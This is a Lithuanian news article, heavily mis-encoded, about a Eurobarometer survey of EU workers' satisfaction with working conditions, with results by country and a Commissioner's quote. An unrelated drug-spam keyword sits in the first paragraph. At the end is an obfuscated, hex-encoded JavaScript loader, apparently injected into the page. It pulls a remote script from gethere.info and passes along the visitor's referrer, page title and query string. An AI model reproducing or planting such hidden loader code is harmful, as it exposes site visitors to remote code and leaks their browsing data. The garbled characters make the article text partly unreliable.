Pagal naujus tyrimus, darbuotojai maA?iau patenkinti darbo sA�lygomis

Flickr.com nuotr.

Nors A?iek tiek daugiau nei pusA� (53 proc.) Europos darbuotojA? mano, kad darbo sA�lygos jA? A?alyje geros (taip mano 50 proc. lietuviA?), vis dA�lto daugumos (57 proc.) ES pilieA?iA? nuomone, jA? darbo sA�lygos per pastaruosius 5 metus pablogA�jo (su tokia nuomone sutinka tik 29 proc. lietuviA?). levitra professional.

Darbo sA�lygos ir jA? raida per 5 paskutinius metus

Tai rodo A?iandien paskelbtas a�zEurobarometroa�? tyrimas, kuriame nagrinA�jama, kaip krizA� paveikA� darbo vietA? kokybA�. Nors dauguma darbuotojA? yra patenkinti savo darbo sA�lygomis (vidutiniA?kai 77 proc. visA? ES darbuotojA?), vienA? A?aliA? rezultatai labai skiriasi nuo kitA?: nuo 94 proc. Danijoje iki 38 proc. Graikijoje. Apskritai dauguma ES darbuotojA? labai patenkinti savo darbo dienos trukme (80 proc.; o Lietuvoje a�� 82 proc.) ir sveikata bei sauga darbe (85 proc.).

a�zEurobarometroa�? tyrimo rezultatais bus naudojamasi balandA?io 28A�d. Briuselyje vyksianA?iose diskusijose apie esamas ir bA�simas ES veiksmA? darbo sA�lygA? srityje perspektyvas. Konferencijoje bus proga aptarti, kaip toliau plA�toti nuoseklA? ir A? ateitA? orientuotA� poA?iA�rA? A? darbo sA�lygas Europos SA�jungoje, uA?tikrinti aukA?tA� kokybA�, saugA� ir lygybA� darbo vietoje.

a�zApsaugoti darbo sA�lygas ir skatinti jA? plA�tojimA� reiA?kia rA�pintis mA�sA? A?mogiA?kuoju kapitalu. Turime nepaprastai vertingA� teisA�s ir politikos paveldA�, kad uA?tikrintumA�me geras darbo sA�lygas, kuriomis Europos darbuotojai bA�tA? labai patenkinti. TaA?iau taip pat baiminamasi, kad po ekonomikos krizA�s darbo sA�lygos pablogA�s, ir A?is pavojus realus. Kartu su valstybA�mis narA�mis ir darbuotojA? bei darbdaviA? organizacijomis turime atnaujinti savo pastangas iA?saugoti ir gerinti darbo sA�lygasa�?, a�� sakA� uA? uA?imtumA�, socialinius reikalus ir A?trauktA? atsakingas Komisijos narys LA?szlA? Andoras.

28 valstybA�se narA�se atlikto a�zEurobarometroa�? tyrimo rezultatai rodo, kad:

– daugiau kaip 80A�proc. respondentA? Danijoje, Liuksemburge, Suomijoje ir Nyderlanduose mano, kad jA? A?alyje darbo sA�lygos geros. Vertinant atskirus darbuotojus, Danija taip pat yra pirmoje vietoje: joje 94A�proc. darbuotojA? yra patenkinti savo darbo sA�lygomis. Antroje vietoje a�� Austrija ir Belgija, kuriose darbo sA�lygomis patenkinti 9 iA? 10 darbuotojA?. Po jA? tik A?iek tiek A?emesni rodikliai Suomijoje (89A�proc.), JungtinA�je KaralystA�je ir Estijoje (po 88A�proc.);

– blogiausiai darbo sA�lygos vertinamos Graikijoje (jas teigiamai A?vertino 16A�% respondentA?). Ji taip pat vienintelA� A?alis, kurioje esamomis savo darbo sA�lygomis patenkinti maA?iau negu pusA� dirbanA?iA? respondentA? (38A�proc.);

– kitos A?alys, kuriose darbo sA�lygomis patenkinta maA?esnA� dalis respondentA?, yra Kroatija (18A�proc.), Ispanija (20A�proc.), Italija (25A�proc.), Bulgarija (31A�proc.), SlovA�nija, Portugalija ir Rumunija (po 32A�%), taip pat Slovakija (36A�proc.) ir Lenkija (38A�proc.).

A�iuos skirtumus galima aiA?kinti A?vairiais veiksniais: krizA�s nulemtomis socialinA�mis ir ekonominA�mis aplinkybA�mis, taip pat struktA�rinA�mis ypatybA�mis, t.A�y. skirtingose ES A?alyse daugiau arba maA?iau iA?vystytu socialiniu dialogu, socialine politika ir darbo teise.

Kitos esminA�s tyrimo iA?vados rodo, kad galimybiA? gerinti padA�tA? yra ypaA? A?iose srityse:

– iA? kai kuriA? iA?vadA? matyti, kad padidA�jo darbo intensyvumas. AiA?kiai matyti, kad stresas laikomas didA?iausia grA�sme darbe (53A�proc. dirbanA?iA? respondentA?). Be to, nepatenkintA? darbo krA�viu, darbo tempu ir ilgomis darbo dienomis (daugiau kaip 13A�val.) yra daugiau negu nepatenkintA? kitais dalykais, pavyzdA?iui, tuo, kad uA?duotys nepakankamai A?domios, arba netinkamais savaitiniais arba metiniais poilsio laikotarpiais;

– atsakydami A? klausimus darbo organizavimo tema apie darbo ir asmeninio gyvenimo pusiausvyrA� 40A�proc. respondentA? teigA�, kad jiems nesudaryta lanksA?iA? darbo sA�lygA? galimybA�;

– sveikatos ir saugos darbe srityje maA?iau nei vienas iA? trijA? darbuotojA? nurodA�, kad jA? darbo vietose yra A?diegta priemoniA? naujiems pavojams (pavyzdA?iui, kylantiems dA�l nanotechnologijA? arba biotechnologijA?) iA?vengti arba vyresnio amA?iaus ir lA�tinA�mis ligomis sergantiems darbuotojams skirtA? priemoniA?. Be streso, kitu vienu iA? svarbiausiA? pavojA? darbe laikoma prasta ergonomika: 28A�proc. respondentA? kaip pagrindinA? pavojA? sveikatai ir saugai darbe nurodA� kartojamus judesius ir varginanA?iA� arba skausmA� kelianA?iA� kA�no padA�tA?, o 24A�proc. a�� daiktA? kA�limA�, neA?iojimA� ir perkA�limA� iA? vienos vietos A? kitA� kasdien.

ArtA�janti ES darbo sA�lygA? konferencija

BalandA?io 28A�d. rengiamoje konferencijoje dalyvaus apie 300 suinteresuotA?jA? A?aliA?. Per penkis seminarus bus proga nuodugniai aptarti darbuotojA? saugA� ir sveikatA�, restruktA�rizavimA�, darbo ir asmeninio gyvenimo derinimA�, staA?uotes ir ES darbo sA�lygA? srities veiksmus tarptautiniu lygmeniu.

Europinio ir nacionalinio lygmens profesinA�s sA�jungos, darbdaviA? organizacijos ir politikos formuotojai kvieA?iami pamA�styti ir imtis bendrA? iniciatyvA?, kuriomis bA�tA? remiamos darbo sA�lygos ir darbo vietA? kokybA�, o tai yra itin svarbu siekiant strategijos a�zEuropa 2020a�? tikslA?. Geros darbo sA�lygos, A?skaitant sveikA� ir saugiA� aplinkA�, daA?nai yra susijusios su didele darbuotojA? motyvacija, kA�rybiA?kumu ir darbA?tumu, o tai galiausiai lemia didelA? darbo naA?umA�.

var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}